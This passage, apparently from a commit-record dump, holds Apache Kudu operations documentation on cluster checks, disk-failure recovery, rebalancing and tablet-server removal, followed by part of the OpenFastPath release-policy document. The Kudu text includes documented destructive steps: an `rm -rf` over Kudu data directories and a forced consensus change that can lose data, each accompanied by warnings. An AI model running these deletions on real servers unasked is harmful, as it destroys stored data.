(UNAVAILABLE)\n\n... 
(full output elided)\n\n==================\nErrors:\n==================\nNetwork error: error fetching info from tablet servers: failed to gather info for all tablet servers: 1 of 3 had errors\nCorruption: table consistency check error: 1 out of 1 table(s) are not healthy\n\nFAILED\nRuntime error: ksck discovered errors\n----\n\nTo verify data integrity, the optional `--checksum_scan` flag can be set, which\nverifies that the cluster's data is consistent by scanning each tablet replica and\ncomparing the results. The `--tables` or `--tablets` flags can be used to limit the\nscope of the checksum scan to specific tables or tablets, respectively. For\nexample, checking data integrity on the `my_table` table can be done with the\nfollowing command:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck --checksum_scan --tables my_table master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nBy default, `ksck` will attempt to use a snapshot scan of the table, so the\nchecksum scan can be done while writes continue.\n\nFinally, `ksck` also supports output in JSON format using the `--ksck_format`\nflag. JSON output contains the same information as the plain text output, but\nin a format that can be used by other tools. See `kudu cluster ksck --help` for\nmore information.\n
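For example, a machine-readable report for consumption by monitoring tools could\nbe produced with something like the following; the exact format names are an\nassumption here, so consult the `--help` output:\n\n[source,bash]\n----\n# Emit the ksck report as compact JSON.\n$ sudo -u kudu kudu cluster ksck --ksck_format=json_compact master-01.example.com,master-02.example.com,master-03.example.com\n----\n\n[[change_dir_config]]\n=== Changing Directory Configurations\n\nFor higher read parallelism and larger volumes of storage per server, users may\nwant to configure servers to store data in multiple directories on different\ndevices. Once a server is started, users must go through the following steps\nto change the directory configuration.\n\nUsers can add data directories to, or remove them from, an existing master or tablet server\nvia the `kudu fs update_dirs` tool. Data is striped across data directories,\nand when a new data directory is added, new data will be striped across the\nunion of the old and new directories.\n\nNOTE: Unless the `--force` flag is specified, Kudu will not allow for the\nremoval of a directory across which tablets are configured to spread data. If\n`--force` is specified, all tablets configured to use that directory will fail\nupon starting up and be replicated elsewhere.\n\nNOTE: If the link:configuration.html#directory_configuration[metadata\ndirectory] overlaps with a data directory, as was the default prior to Kudu\n1.7, or if a non-default metadata directory is configured, the\n`--fs_metadata_dir` configuration must be specified when running the `kudu fs\nupdate_dirs` tool.\n\nNOTE: Only new tablet replicas (i.e. brand new tablets' replicas and replicas\nthat are copied to the server for high availability) will use the new\ndirectory. Existing tablet replicas on the server will not be rebalanced across\nthe new directory.\n\nWARNING: All of the command line steps below should be executed as the Kudu\nUNIX user, typically `kudu`.\n\n. The tool can only run while the server is offline, so establish a maintenance\n window to update the server. The tool itself runs quickly, so this offline\n window should be brief, and as such, only the server to update needs to be\n offline. However, if the server is offline for too long (see the\n `follower_unavailable_considered_failed_sec` flag), the tablet replicas on it\n may be evicted from their Raft groups. To avoid this, it may be desirable to\n bring the entire cluster offline while performing the update.\n\n. Run the tool with the desired directory configuration flags. 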
For example, if a\n cluster was set up with `--fs_wal_dir=\/wals`, `--fs_metadata_dir=\/meta`, and\n `--fs_data_dirs=\/data\/1,\/data\/2,\/data\/3`, and `\/data\/3` is to be removed (e.g.\n due to a disk error), run the command:\n\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs update_dirs --force --fs_wal_dir=\/wals --fs_metadata_dir=\/meta --fs_data_dirs=\/data\/1,\/data\/2\n----\n+\n\n. Modify the values of the `fs_data_dirs` flags for the updated server. If using\n CM, make sure to only update the configurations of the updated server, rather\n than of the entire Kudu service.\n\n. Once complete, the server process can be started. When Kudu is installed using\n system packages, `service` is typically used:\n\n+\n[source,bash]\n----\n$ sudo service kudu-tserver start\n----\n+\n\n\n[[disk_failure_recovery]]\n=== Recovering from Disk Failure\n\nKudu nodes can only survive failures of disks on which certain Kudu directories\nare mounted. For more information about the different Kudu directory types, see\nthe section on link:configuration.html#directory_configuration[Kudu Directory\nConfigurations]. The table below describes this behavior across different Apache\nKudu releases.\n\n[[disk_failure_behavior]]\n.Kudu Disk Failure Behavior\n[cols=\"<,<,<\",options=\"header\"]\n|===\n| Node Type | Kudu Directory Type | Kudu Releases that Crash on Disk Failure\n| Master | All | All\n| Tablet Server | Directory containing WALs | All\n| Tablet Server | Directory containing tablet metadata | All\n| Tablet Server | Directory containing data blocks only | Pre-1.6.0\n|===\n\nWhen a disk failure occurs that does not lead to a crash, Kudu will stop using\nthe affected directory, shut down tablets with blocks on the affected\ndirectories, and automatically re-replicate the affected tablets to other\ntablet servers. The affected server will remain alive and print messages to the\nlog indicating the disk failure, for example:\n\n----\nE1205 19:06:24.163748 27115 data_dirs.cc:1011] Directory \/data\/8\/kudu\/data marked as failed\nE1205 19:06:30.324795 27064 log_block_manager.cc:1822] Not using report from \/data\/8\/kudu\/data: IO error: Could not open container 0a6283cab82d4e75848f49772d2638fe: \/data\/8\/kudu\/data\/0a6283cab82d4e75848f49772d2638fe.metadata: Read-only file system (error 30)\nE1205 19:06:33.564638 27220 ts_tablet_manager.cc:946] T 4957808439314e0d97795c1394348d80 P 70f7ee61ead54b1885d819f354eb3405: aborting tablet bootstrap: tablet has data in a failed directory\n----\n\nWhile in this state, the affected node will avoid using the failed disk,\nleading to lower storage volume and reduced read parallelism. The administrator\nshould schedule a brief window to <<change_dir_config,update the node's\ndirectory configuration>> to exclude the failed disk.\n\nWhen the disk is repaired, remounted, and ready to be reused by Kudu, take the\nfollowing steps:\n\n. Make sure that the Kudu portion of the disk is completely empty.\n. Stop the tablet server.\n. Run the `update_dirs` tool. For example, to add `\/data\/3`, run the following:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs update_dirs --force --fs_wal_dir=\/wals --fs_data_dirs=\/data\/1,\/data\/2,\/data\/3\n----\n+\n\n. Start the tablet server.\n. 
Run `ksck` to verify cluster health.\n+\n[source,bash]\n----\nsudo -u kudu kudu cluster ksck master-01.example.com\n----\n+\n\n\nNote that existing tablets will not stripe to the restored disk, but any new tablets\nwill stripe to the restored disk.\n\n[[disk_full_recovery]]\n=== Recovering from Full Disks\n\nBy default, Kudu reserves a small amount of space (1% by capacity) in its\ndirectories; Kudu considers a disk full if there is less free space available\nthan the reservation. Kudu nodes can only tolerate running out of space on disks\non which certain Kudu directories are mounted. For more information about the\ndifferent Kudu directory types, see\nlink:configuration.html#directory_configuration[Kudu Directory Configurations].\nThe table below describes this behavior for each type of directory. The behavior\nis uniform across masters and tablet servers.\n\n[[disk_full_behavior]]\n.Kudu Full Disk Behavior\n[options=\"header\"]\n|===\n| Kudu Directory Type | Crash on a Full Disk?\n| Directory containing WALs | Yes\n| Directory containing tablet metadata | Yes\n| Directory containing data blocks only | No (see below)\n|===\n\nPrior to Kudu 1.7.0, Kudu striped tablet data across all directories and would\navoid writing data to full directories; it would crash if all data directories\nwere full.\n\nIn 1.7.0 and later, new tablets are assigned a disk group consisting of\n`--fs_target_data_dirs_per_tablet` data directories (default 3). If Kudu is not configured\nwith enough data directories for a full disk group, all data directories are\nused. When a data directory is full, Kudu will stop writing new data to it and\neach tablet that uses that data directory will write new data to other data\ndirectories within its group. If all data directories for a tablet are full, Kudu\nwill crash. Periodically, Kudu will check if full data directories are still\nfull, and will resume writing to those data directories if space has become\navailable.\n\nIf Kudu does crash because its data directories are full, freeing space on the\nfull directories will allow the affected daemon to restart and resume writing.\nNote that it may be possible for Kudu to free some space by running\n\n[source,bash]\n----\n$ sudo -u kudu kudu fs check --repair\n----\n\nbut this command may also fail if there is too little space left.\n\nIt's also possible to allocate additional data directories to Kudu in order to\nincrease the overall amount of storage available. See the documentation on\n<<change_dir_config,updating a node's directory configuration>> for more\ninformation. Note that existing tablets will not use new data directories, so\nadding a new data directory does not resolve issues with full disks.\n\n[[tablet_majority_down_recovery]]\n=== Bringing a tablet that has lost a majority of replicas back online\n\nIf a tablet has permanently lost a majority of its replicas, it cannot recover\nautomatically and operator intervention is required. If the tablet servers\nhosting a majority of the replicas are down (i.e. ones reported as \"TS\nunavailable\" by ksck), they should be recovered instead if possible.\n\nWARNING: The steps below may cause recent edits to the tablet to be lost,\npotentially resulting in permanent data loss. Only attempt the procedure below\nif it is impossible to bring a majority back online.\n\nSuppose a tablet has lost a majority of its replicas. 
The first step in\ndiagnosing and fixing the problem is to examine the tablet's state using ksck:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck --tablets=e822cab6c0584bc0858219d1539a17e6 master-00,master-01,master-02\nConnected to the Master\nFetched info from all 5 Tablet Servers\nTablet e822cab6c0584bc0858219d1539a17e6 of table 'my_table' is unavailable: 2 replica(s) not RUNNING\n 638a20403e3e4ae3b55d4d07d920e6de (tserver-00:7150): RUNNING\n 9a56fa85a38a4edc99c6229cba68aeaa (tserver-01:7150): bad state\n State: FAILED\n Data state: TABLET_DATA_READY\n Last status: <failure message>\n c311fef7708a4cf9bb11a3e4cbcaab8c (tserver-02:7150): bad state\n State: FAILED\n Data state: TABLET_DATA_READY\n Last status: <failure message>\n----\n\nThis output shows that, for tablet `e822cab6c0584bc0858219d1539a17e6`, the two\ntablet replicas on `tserver-01` and `tserver-02` failed. The remaining replica\nis not the leader, so the leader replica failed as well. This means the chance\nof data loss is higher since the remaining replica on `tserver-00` may have\nbeen lagging. In general, to accept the potential data loss and restore the\ntablet from the remaining replicas, divide the tablet replicas into two groups:\n\n1. Healthy replicas: Those in `RUNNING` state as reported by ksck\n2. Unhealthy replicas\n\nFor example, in the above ksck output, the replica on tablet server `tserver-00`\nis healthy, while the replicas on `tserver-01` and `tserver-02` are unhealthy.\nOn each tablet server with a healthy replica, alter the consensus configuration\nto remove unhealthy replicas. In the typical case of 1 out of 3 surviving\nreplicas, there will be only one healthy replica, so the consensus configuration\nwill be rewritten to include only the healthy replica.\n\n[source,bash]\n----\n$ sudo -u kudu kudu remote_replica unsafe_change_config tserver-00:7150 <tablet-id> <tserver-00-uuid>\n----\n\nwhere `<tablet-id>` is `e822cab6c0584bc0858219d1539a17e6` and\n`<tserver-00-uuid>` is the UUID of `tserver-00`,\n`638a20403e3e4ae3b55d4d07d920e6de`.\n
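Filled in with the values from this example, the command becomes:\n\n[source,bash]\n----\n$ sudo -u kudu kudu remote_replica unsafe_change_config tserver-00:7150 e822cab6c0584bc0858219d1539a17e6 638a20403e3e4ae3b55d4d07d920e6de\n----\n\nOnce the healthy replicas' consensus configurations have been forced to exclude\nthe unhealthy replicas, the healthy replicas will be able to elect a leader.\nThe tablet will become available for writes, though it will still be\nunder-replicated. Shortly after the tablet becomes available, the leader master\nwill notice that it is under-replicated, and will cause the tablet to\nre-replicate until the proper replication factor is restored. The unhealthy\nreplicas will be tombstoned by the master, causing their remaining data to be\ndeleted.\n\n[[rebuilding_kudu]]\n=== Rebuilding a Kudu Filesystem Layout\n\nIn the event that critical files are lost, i.e. WALs or tablet-specific\nmetadata, all Kudu directories on the server must be deleted and rebuilt to\nensure correctness. Doing so will destroy the copy of the data for each tablet\nreplica hosted on the local server. Kudu will automatically re-replicate tablet\nreplicas removed in this way, provided the replication factor is at least three\nand all other servers are online and healthy.\n\nNOTE: These steps use a tablet server as an example, but the steps are the same\nfor Kudu master servers.\n\nWARNING: If multiple nodes need their FS layouts rebuilt, wait until all\nreplicas previously hosted on each node have finished automatically\nre-replicating elsewhere before continuing. 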
Failure to do so can result in\npermanent data loss.\n\nWARNING: Before proceeding, ensure the contents of the directories are backed\nup, either as a copy or in the form of other tablet replicas.\n\n. The first step to rebuilding a server with a new directory configuration is\n emptying all of the server's existing directories. For example, if a tablet\n server is configured with `--fs_wal_dir=\/data\/0\/kudu-tserver-wal`,\n `--fs_metadata_dir=\/data\/0\/kudu-tserver-meta`, and\n `--fs_data_dirs=\/data\/1\/kudu-tserver,\/data\/2\/kudu-tserver`, the following\n commands will remove the WAL directory's and data directories' contents:\n\n+\n[source,bash]\n----\n# Note: this will delete all of the data from the local tablet server.\n$ rm -rf \/data\/0\/kudu-tserver-wal\/* \/data\/0\/kudu-tserver-meta\/* \/data\/1\/kudu-tserver\/* \/data\/2\/kudu-tserver\/*\n----\n+\n\n. If using CM, update the configurations for the rebuilt server to include only\n the desired directories. Make sure to only update the configurations of servers\n to which changes were applied, rather than of the entire Kudu service.\n\n. After directories are deleted, the server process can be started with the new\n directory configuration. The appropriate sub-directories will be created by\n Kudu upon starting up.\n\n[[minimizing_cluster_disruption_during_temporary_single_ts_downtime]]\n=== Minimizing cluster disruption during temporary planned downtime of a single tablet server\n\nIf a single tablet server is brought down temporarily in a healthy cluster, all\ntablets will remain available and clients will function as normal, after\npotential short delays due to leader elections. However, if the downtime lasts\nfor more than `--follower_unavailable_considered_failed_sec` (default 300)\nseconds, the tablet replicas on the down tablet server will be replaced by new\nreplicas on available tablet servers. This will cause stress on the cluster\nas tablets re-replicate and, if the downtime lasts long enough, a significant\nreduction in the number of replicas on the down tablet server, which the\nrebalancer may be needed to fix afterwards.\n\nTo work around this, increase `--follower_unavailable_considered_failed_sec` on\nall tablet servers so the amount of time before re-replication will start is\nlonger than the expected downtime of the tablet server, including the time it\ntakes the tablet server to restart and bootstrap its tablet replicas. To do\nthis, run the following command for each tablet server:\n\n[source,bash]\n----\n$ sudo -u kudu kudu tserver set_flag <tserver_address> follower_unavailable_considered_failed_sec <num_seconds>\n----\n\nwhere `<num_seconds>` is the number of seconds that will encompass the downtime.\nOnce the downtime is finished, reset the flag to its original value.\n\n[source,bash]\n----\n$ sudo -u kudu kudu tserver set_flag <tserver_address> follower_unavailable_considered_failed_sec <original_value>\n----\n\nWARNING: Be sure to reset the value of `--follower_unavailable_considered_failed_sec`\nto its original value.\n\nNOTE: On Kudu versions prior to 1.8, the `--force` flag must be provided in the above\n`set_flag` commands.\n\n[[rebalancer_tool]]\n=== Running the tablet rebalancing tool\n\nThe `kudu` CLI contains a rebalancing tool that can be used to rebalance\ntablet replicas among tablet servers. For each table, the tool attempts to\nbalance the number of replicas per tablet server. It will also, without\nunbalancing any table, attempt to even out the number of replicas per tablet\nserver across the cluster as a whole. 
The rebalancing tool should be run as the\nKudu admin user, specifying all master addresses:\n\n[source,bash]\n----\nsudo -u kudu kudu cluster rebalance master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nWhen run, the rebalancer will report on the initial tablet replica distribution\nin the cluster, log the replicas it moves, and print a final summary of the\ndistribution when it terminates:\n\n----\nPer-server replica distribution summary:\n Statistic | Value\n-----------------------+-----------\n Minimum Replica Count | 0\n Maximum Replica Count | 24\n Average Replica Count | 14.400000\n\nPer-table replica distribution summary:\n Replica Skew | Value\n--------------+----------\n Minimum | 8\n Maximum | 8\n Average | 8.000000\n\nI0613 14:18:49.905897 3002065792 rebalancer.cc:779] tablet e7ee9ade95b342a7a94649b7862b345d: 206a51de1486402bbb214b5ce97a633c -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move scheduled\nI0613 14:18:49.917578 3002065792 rebalancer.cc:779] tablet 5f03944529f44626a0d6ec8b1edc566e: 6e64c4165b864cbab0e67ccd82091d60 -> ba8c22ab030346b4baa289d6d11d0809 move scheduled\nI0613 14:18:49.928683 3002065792 rebalancer.cc:779] tablet 9373fee3bfe74cec9054737371a3b15d: fab382adf72c480984c6cc868fdd5f0e -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move scheduled\n\n... (full output elided)\n\nI0613 14:19:01.162802 3002065792 rebalancer.cc:842] tablet f4c046f18b174cc2974c65ac0bf52767: 206a51de1486402bbb214b5ce97a633c -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move completed: OK\n\nrebalancing is complete: cluster is balanced (moved 28 replicas)\nPer-server replica distribution summary:\n Statistic | Value\n-----------------------+-----------\n Minimum Replica Count | 14\n Maximum Replica Count | 15\n Average Replica Count | 14.400000\n\nPer-table replica distribution summary:\n Replica Skew | Value\n--------------+----------\n Minimum | 1\n Maximum | 1\n Average | 1.000000\n----\n\nIf more details are needed in addition to the replica distribution summary,\nuse the `--output_replica_distribution_details` flag. If added, the flag makes\nthe tool print per-table and per-tablet-server replica distribution statistics\nas well.\n\nUse the `--report_only` flag to get a report on table- and cluster-wide\nreplica distribution statistics without starting any rebalancing activity.\n\nThe rebalancer can also be restricted to run on a subset of the tables by\nsupplying the `--tables` flag. Note that, when running on a subset of tables,\nthe tool will not attempt to balance the cluster as a whole.\n\nThe length of time the rebalancer runs for can be controlled with the flag\n`--max_run_time_sec`. By default, the rebalancer will run until the cluster is\nbalanced. To control the amount of resources devoted to rebalancing, modify\nthe flag `--max_moves_per_server`. See `kudu cluster rebalance --help` for more.\n
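For instance, a dry run that only reports the current distribution for a couple\nof tables might look like the following; the table names are placeholders:\n\n[source,bash]\n----\n# Report distribution statistics without moving any replicas.\nsudo -u kudu kudu cluster rebalance --report_only --tables=my_table1,my_table2 master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nIt's safe to stop the rebalancer tool at any time. When restarted, the\nrebalancer will continue rebalancing the cluster.\n\nThe rebalancer requires all registered tablet servers to be up and running\nto proceed with the rebalancing process. That's to avoid possible conflicts\nand races with the automatic re-replication and to keep replica placement optimal\nfor the current configuration of the cluster. If a tablet server becomes\nunavailable during the rebalancing session, the rebalancer will exit. 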
As noted\nabove, it's safe to restart the rebalancer after resolving the issue with\nunavailable tablet servers.\n\nThe rebalancing tool can rebalance Kudu clusters running older versions as well,\nwith some restrictions. Consult the following table for more information. In the\ntable, \"RF\" stands for \"replication factor\".\n\n[[rebalancer_compatibility]]\n.Kudu Rebalancing Tool Compatibility\n[options=\"header\"]\n|===\n| Version Range | Rebalances RF = 1 Tables? | Rebalances RF > 1 Tables?\n| v < 1.4.0 | No | No\n| 1.4.0 +<=+ v < 1.7.1 | No | Yes\n| v >= 1.7.1 | Yes | Yes\n|===\n\nIf the rebalancer is running against a cluster where rebalancing replication\nfactor one tables is not supported, it will rebalance all the other tables\nand the cluster as if those singly-replicated tables did not exist.\n\n[[rebalancer_tool_with_rack_awareness]]\n=== Running the tablet rebalancing tool on a rack-aware cluster\n\nAs detailed in the <<rack_awareness, rack awareness>> section, it's possible\nto use the `kudu cluster rebalance` tool to establish the placement policy on a\ncluster. This might be necessary when the rack awareness feature is first\nconfigured or when re-replication has violated the placement policy. The rebalancing\ntool breaks its work into three phases:\n\n. The rack-aware rebalancer tries to establish the placement policy. Use the\n `--disable_policy_fixer` flag to skip this phase.\n. The rebalancer tries to balance load by location, moving tablet replicas\n between locations in an attempt to spread tablet replicas among locations\n evenly. The load of a location is measured as the total number of replicas in\n the location divided by the number of tablet servers in the location. Use the\n `--disable_cross_location_rebalancing` flag to skip this phase.\n. The rebalancer tries to balance the tablet replica distribution within each\n location, as if the location were a cluster on its own. Use the\n `--disable_intra_location_rebalancing` flag to skip this phase.\n\nBy using the `--report_only` flag, it's also possible to check if all tablets in\nthe cluster conform to the placement policy without attempting any replica\nmovement.\n\n[[tablet_server_decommissioning]]\n=== Decommissioning or Permanently Removing a Tablet Server From a Cluster\n\nKudu does not currently have an automated way to remove a tablet server from\na cluster permanently. Instead, use the following steps:\n\n. Ensure the cluster is in good health using `ksck`. See <<ksck>>.\n. If the tablet server contains any replicas of tables with replication factor\n 1, these replicas must be manually moved off the tablet server prior to\n shutting it down. The `kudu tablet change_config move_replica` tool can be\n used for this.
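+\nA sketch of a single replica move follows; the tablet ID and tablet server\nUUIDs are placeholders to be filled in from `ksck` output:\n+\n[source,bash]\n----\n# Move the replica of the given tablet from one tablet server to another.\n$ sudo -u kudu kudu tablet change_config move_replica <master_addresses> <tablet_id> <from_ts_uuid> <to_ts_uuid>\n----\n. Shut down the tablet server. After\n `--follower_unavailable_considered_failed_sec`, which defaults to 5 minutes,\n Kudu will begin to re-replicate the tablet server's replicas to other servers.\n Wait until the process is finished. Progress can be monitored using `ksck`.\n. Once all the copies are complete, `ksck` will continue to report the tablet\n server as unavailable. The cluster will otherwise operate fine without the\n tablet server. To completely remove it from the cluster so `ksck` shows the\n cluster as completely healthy, restart the masters. In the case of a single\n master, this will cause cluster downtime. With multi-master, restart the\n masters in sequence to avoid cluster downtime.\n\nWARNING: Do not shut down multiple tablet servers at once. 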
To remove multiple\ntablet servers from the cluster, follow the above instructions for each tablet\nserver, ensuring that the previous tablet server is removed from the cluster and\n`ksck` is healthy before shutting down the next.\n\n[[using_cluster_names_in_kudu_tool]]\n=== Using cluster names in the `kudu` command line tool\n\nWhen using the `kudu` command line tool, it can be difficult to remember the\nprecise list of Kudu master RPC addresses needed to communicate with a cluster,\nespecially when managing multiple clusters. As an alternative, the command line\ntool can identify clusters by name. To use this functionality:\n\n. Create a new directory to store the Kudu configuration file.\n. Export the path to this directory in the `KUDU_CONFIG` environment variable.\n. Create a file called `kudurc` in the new directory.\n. Populate `kudurc` as follows, substituting your own cluster names and RPC\n addresses:\n+\n----\nclusters_info:\n cluster_name1:\n master_addresses: ip1:port1,ip2:port2,ip3:port3\n cluster_name2:\n master_addresses: ip4:port4\n----\n+\n. When using the `kudu` command line tool, replace the list of Kudu master RPC\n addresses with the cluster name, prepended with the character `@`.\n\n Example::\n+\n----\n$ sudo -u kudu kudu ksck @cluster_name1\n----\n+\n\n\nNOTE: Cluster names may be used as input in any invocation of the `kudu` command\nline tool that expects a list of Kudu master RPC addresses.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b4703b9ad2d53358c96597e4cd1cb2cc963667b","subject":"docs: Specify that OFP should adapt to ODP LTS releases.","message":"docs: Specify that OFP should adapt to ODP LTS releases.\n\nODP Long Term Support (LTS) releases are the ones that are actually\nsupported by ODP and vendors alike, so those are the ODP releases OFP\nshould adapt to.\n\nSigned-off-by: Jere Lepp\u00e4nen <14957520de8d9815e0c353a07fe23c737f0171e9@nokia.com>\nReviewed-by: Sorin Vultureanu <8013ba55f8675034bc2ab0d6c3a1c9650437ca36@enea.com>\n","repos":"TolikH\/ofp,OpenFastPath\/ofp,TolikH\/ofp,OpenFastPath\/ofp,OpenFastPath\/ofp,TolikH\/ofp,OpenFastPath\/ofp","old_file":"docs\/release-policy.adoc","new_file":"docs\/release-policy.adoc","new_contents":"= OpenFastPath Release Policy\nJere Lepp\u00e4nen <jere.leppanen@nokia.com>\n:max-width: 600px\n:numbered:\n:toc:\n\n\n\n== Introduction\n\nThis document defines the policies concerning OpenFastPath (OFP)\nsoftware releases. Written rules are required to produce uniform\nreleases. Publicly documented release policy and release process also\nbrings some predictability to the project, which is beneficial to both\nusers and contributors.\n\nThis document is informational, not binding. The policy may be changed\nat the decision of the OFP Technical Steering Committee (TSC).\n\nThe purpose of OFP releases is to provide supported software with a\nstable API and ABI to users. 
The API is defined by C header files in\nthe include\/api directory in the OFP repository <<repo>>.\n\n\n\n== Versioning and Naming\n\n* Semantic Versioning <<semver>> is used.\n\n* Versioning is driven by API, ABI and CLI.\n\n ** Any compatible change of API, ABI or CLI increments the minor\n version.\n\n ** Any incompatible change of API, ABI or CLI increments the major\n version.\n\n ** An incompatible CLI change means that a CLI command doesn't\n work anymore or does something different than it did before.\n\n* Every minor version is a release.\n\n* Releases are named after small animals, with the first letters of\n the names progressing in alphabetical order.\n\n* Bug fixes are gathered and tagged as a patch version, and published\n as a patch release.\n\n* Libraries are versioned independently from release versioning, and\n independently of each other, using Semantic Versioning driven by the\n ABI provided by the library.\n\n.Referring to a release or a version\n****\n. \"OpenFastPath\" or \"OFP\", without the quotes.\n. Release name, starting with a capital letter.\n. Version.\n\nSome elements may be omitted, but the remaining elements always appear\nin this order.\n\nExamples:\n\n* OpenFastPath Angelfish 2.0.0 - for maximum clarity.\n\n* OFP Angelfish - when the exact version doesn't matter, because\n they're all compatible anyway.\n\n* OFP 2.0.0 - when you don't care about the naming.\n\n* Angelfish 2.0.0 - when referring to a release, but at the same time\n wanting to specify the exact version for those individuals in the\n audience for whom it means something.\n****\n\n\n\n== Compatibility\n\nIt follows from the versioning scheme that within a release, API, ABI\nand CLI are backwards compatible. Beyond that, version numbers are\nneeded to determine whether two releases are compatible or not.\n\nEach library is separately versioned, so it's possible for a\nparticular library to be ABI compatible across different releases or\neven across different major versions.\n\n\n\n== Requirements\n\nRelease Notes lists the requirements for each OFP release, including\nthe required version of OpenDataPlane (ODP). Newer compatible\nversions of ODP may be used. In ODP's four level versioning, as long\nas the first two levels remain the same, the API is compatible. Please\nsee <<ODPRG>> for more information on ODP release versioning.\n\n\n\n== Support\n\nAll serious bugs in the current General Availability release are fixed\non a best-effort basis. Bug fixes are integrated in a patch release.\nThe example applications in the examples directory may have a lower\nsupport priority than the core implementation.\n\nNew features and improvements are usually added only in new releases,\nalthough it's possible to add new features in a patch release as long\nas compatibility is preserved.\n\n\n\n== Release Contents\n\nAn OFP release consists of the following source code and documentation:\n\n* Release Announcement on the OFP announcements page and on the\n mailing list, which states the name, version and date of the\n release, and contains a link to the Release Notes.\n\n* Release Notes, which includes information about requirements, the\n release life cycle, changes since last release and known\n issues. 
Release Notes are archived on the OFP Release Archive page\n <<relarch>>.\n\n* Release tag in the OFP repository <<repo>>, and all the content in\n the repository that the release tag points to.\n\n\n\n== Release Life Cycle\n\n* The stages of a release are:\n\n Development:: In this stage, new features are being developed and\n old features may be modified or even removed. The API, ABI and\n CLI may be unstable.\n\n Release Candidate:: Once all features have been implemented and\n API finalized, a feature freeze, which implies API, ABI and\n CLI freeze, may be initiated and the release moved to the\n release candidate stage. Release candidates are tagged. If\n issues are found, a correction is made and a new release\n candidate is tagged. Even though the API is frozen, bugs in\n the API may still be corrected in this stage. Once a release\n enters the Release Candidate stage, the next release enters\n Development stage.\n\n General Availability:: A release may enter this stage once the\n following criteria are met:\n\n *** All automated test cases pass.\n\n *** At least one week has passed since the last release\n candidate was tagged, and no issues requiring a correction\n have been found.\n\n *** All release content, listed in the\n <<_release_contents,Release Contents>> section, is\n available.\n\n End of Life:: A release enters End of Life stage once the next\n release enters General Availability stage. In the End of Life\n stage, no changes are made to the release and bug reports are\n not necessarily accepted anymore. Even if a bug report is\n accepted, the correction will only be done to the current\n release.\n\n* Only one release at a time is maintained (in General Availability\n stage).\n\n* General Availability stage lasts for at least five months.\n\n* OFP aims to adapt to new ODP Long Term Support (LTS) releases within\n one month of the ODP release. This usually necessitates a new OFP\n release.\n\n* Stage transitions are communicated on the announcements page and\n mailing list at least one week beforehand, End of Life at least one\n month beforehand.\n\n* The decisions and approvals related to transitions between these\n stages are the responsibility of the TSC, based on the criteria\n above and inputs and comments from OFP members.\n\n\n\n== References\n\n[bibliography]\n\n* [[[ODPRG]]] ODP Release Guide.\n http:\/\/docs.opendataplane.org\/snapshots\/odp-publish\/generic\/usr_html\/latest\/master\/linux-generic\/output\/release-guide.html\n\n* [[[relarch]]] OFP Release Archive.\n http:\/\/www.openfastpath.org\/index.php\/service\/releasearchives\/\n\n* [[[repo]]] OFP Repository. https:\/\/github.com\/OpenFastPath\/ofp\n\n* [[[semver]]] Semantic Versioning 2.0.0.\n http:\/\/semver.org\/spec\/v2.0.0.html\n","old_contents":"= OpenFastPath Release Policy\nJere Lepp\u00e4nen <jere.leppanen@nokia.com>\n:max-width: 600px\n:numbered:\n:toc:\n\n\n\n== Introduction\n\nThis document defines the policies concerning OpenFastPath (OFP)\nsoftware releases. Written rules are required to produce uniform\nreleases. Publicly documented release policy and release process also\nbrings some predictability to the project, which is beneficial to both\nusers and contributors.\n\nThis document is informational, not binding. The policy may be changed\nat the decision of the OFP Technical Steering Committee (TSC).\n\nThe purpose of OFP releases is to provide supported software with a\nstable API and ABI to users. 
The API is defined by C header files in\nthe include\/api directory in the OFP repository <<repo>>.\n\n\n\n== Versioning and Naming\n\n* Semantic Versioning <<semver>> is used.\n\n* Versioning is driven by API, ABI and CLI.\n\n ** Any compatible change of API, ABI or CLI increments the minor\n version.\n\n ** Any incompatible change of API, ABI or CLI increments the major\n version.\n\n ** An incompatible CLI change means that a CLI command doesn't\n work anymore or does something different than it did before.\n\n* Every minor version is a release.\n\n* Releases are named after small animals, with the first letters of\n the names progressing in alphabetical order.\n\n* Bug fixes are gathered and tagged as a patch version, and published\n as a patch release.\n\n* Libraries are versioned independently from release versioning, and\n independently of each other, using Semantic Versioning driven by the\n ABI provided by the library.\n\n.Referring to a release or a version\n****\n. \"OpenFastPath\" or \"OFP\", without the quotes.\n. Release name, starting with a capital letter.\n. Version.\n\nSome elements may be omitted, but the remaining elements always appear\nin this order.\n\nExamples:\n\n* OpenFastPath Angelfish 2.0.0 - for maximum clarity.\n\n* OFP Angelfish - when the exact version doesn't matter, because\n they're all compatible anyway.\n\n* OFP 2.0.0 - when you don't care about the naming.\n\n* Angelfish 2.0.0 - when referring to a release, but at the same time\n wanting to specify the exact version for those individuals in the\n audience for whom it means something.\n****\n\n\n\n== Compatibility\n\nIt follows from the versioning scheme that within a release, API, ABI\nand CLI are backwards compatible. Beyond that, version numbers are\nneeded to determine whether two releases are compatible or not.\n\nEach library is separately versioned, so it's possible for a\nparticular library to be ABI compatible across different releases or\neven across different major versions.\n\n\n\n== Requirements\n\nRelease Notes lists the requirements for each OFP release, including\nthe required version of OpenDataPlane (ODP). Newer compatible\nversions of ODP may be used. In ODP's four level versioning, as long\nas the first two levels remain the same, the API is compatible. Please\nsee <<ODPRG>> for more information on ODP release versioning.\n\n\n\n== Support\n\nAll serious bugs in the current General Availability release are fixed\non a best-effort basis. Bug fixes are integrated in a patch release.\nThe example applications in the examples directory may have a lower\nsupport priority than the core implementation.\n\nNew features and improvements are usually added only in new releases,\nalthough it's possible to add new features in a patch release as long\nas compatibility is preserved.\n\n\n\n== Release Contents\n\nAn OFP release consists of the following source code and documentation:\n\n* Release Announcement on the OFP announcements page and on the\n mailing list, which states the name, version and date of the\n release, and contains a link to the Release Notes.\n\n* Release Notes, which includes information about requirements, the\n release life cycle, changes since last release and known\n issues. 
